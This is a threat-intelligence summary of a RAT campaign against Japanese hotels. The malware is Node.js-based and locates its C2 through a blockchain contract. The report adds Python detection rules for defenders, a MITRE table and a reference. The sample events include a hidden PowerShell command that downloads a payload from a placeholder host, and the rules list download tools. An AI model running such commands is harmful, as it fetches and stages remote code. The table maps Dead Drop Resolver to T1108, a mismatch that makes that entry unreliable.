EXECUTIVE SUMMARY
An unidentified threat group is actively targeting the Japanese hospitality sector, specifically hotels partnered with Booking.com. This campaign employs a remote access trojan designed to establish a persistent foothold within corporate networks. Attackers aim to steal sensitive credentials and facilitate further compromise by disguising malicious emails as urgent guest complaints or review requests. By focusing on hotel employees, the actors seek to gain initial access through social engineering, ultimately aiming to exfiltrate valuable data and maintain long-term control over infected environments.
The attack chain begins with phishing emails that trick recipients into downloading a zip archive containing a disguised shortcut file. Executing this file triggers a PowerShell script that retrieves a JavaScript payload and runs it with the legitimate Node.js runtime. Once active, the malware queries a blockchain smart contract to locate the command-and-control server, so the infrastructure stays resilient against takedowns. The malware keeps its session alive through a keepalive loop, allowing operators to issue commands remotely and steal stored credentials without relying on hardcoded server addresses.
This threat poses significant risks because using blockchain for command-and-control infrastructure makes blocking malicious domains extremely difficult for traditional security tools. The abuse of legitimate applications like Node.js helps the malware blend in with normal network traffic, evading standard detection methods. Organizations should restrict unnecessary access to blockchain platforms and closely monitor PowerShell activity. Additionally, implementing strict email filtering and training staff to recognize suspicious customer service inquiries can disrupt the initial infection vector before it reaches the endpoint.
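As an added illustration of the "monitor PowerShell activity" and "restrict access to blockchain platforms" mitigations above (this is example code, not part of the original report or any vendor tool), the script below runs three detection rules over constructed process and network events that mirror the described chain: hidden PowerShell download, Node.js launched from PowerShell or a temp directory, and Node.js contacting a blockchain RPC host. The RPC host list and all event values are placeholders a defender would replace with their own telemetry.

```python
import re

# Constructed sample events (not real telemetry): the hypothetical chain
# explorer -> powershell -> node -> RPC host, plus one benign developer Node.js run.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr http://placeholder.invalid/p.js -OutFile $env:TEMP\\p.js"',
     "dst_host": None},
    {"parent": "powershell.exe", "image": "node.exe",
     "cmdline": r"node.exe C:\Users\staff\AppData\Local\Temp\p.js", "dst_host": None},
    {"parent": "powershell.exe", "image": "node.exe",
     "cmdline": r"node.exe C:\Users\staff\AppData\Local\Temp\p.js", "dst_host": "rpc.example-chain.invalid"},
    {"parent": "explorer.exe", "image": "node.exe",
     "cmdline": r"node.exe C:\dev\app\server.js", "dst_host": None},
]

# Placeholder set; a defender populates it with the RPC endpoints of chains the
# organisation has no business reason to reach.
BLOCKCHAIN_RPC_HOSTS = {"rpc.example-chain.invalid"}

PS_DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)
PS_STEALTH = re.compile(r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-enc\b)", re.I)
TEMP_PATH = re.compile(r"\\(Temp|Downloads)\\", re.I)


def rules_fired(evt):
    """Return the names of the detection rules matching one process/network event."""
    fired = []
    image, parent = evt["image"].lower(), evt["parent"].lower()
    cmd = evt.get("cmdline") or ""
    # Stage 1: shortcut-launched PowerShell fetching the payload with a hidden window.
    if image == "powershell.exe" and PS_DOWNLOAD.search(cmd) and PS_STEALTH.search(cmd):
        fired.append("ps_hidden_download")
    # Stage 2: the JavaScript payload executed through the legitimate Node.js runtime.
    if image == "node.exe" and (parent == "powershell.exe" or TEMP_PATH.search(cmd)):
        fired.append("node_from_powershell_or_temp")
    # Stage 3: Node.js resolving its C2 address via a blockchain RPC endpoint.
    if image == "node.exe" and (evt.get("dst_host") or "").lower() in BLOCKCHAIN_RPC_HOSTS:
        fired.append("node_to_blockchain_rpc")
    return fired


def find_alerts(events):
    """Map each event index to its fired rules, skipping events that match nothing."""
    return {i: r for i, e in enumerate(events) if (r := rules_fired(e))}
```

The benign developer run in the last event matches no rule, which is the point: the rules key on the chain's parent process and staging path, not on Node.js itself.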
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Resource Development | T1583.001 | Acquire Infrastructure | Domains |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Command and Control | T1108 | Dead Drop Resolver | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1105 | Ingress Tool Transfer | — |
REFERENCES:
The following reports contain further technical details:
https://www.trendmicro.com/en_us/research/26/f/tonresolver.html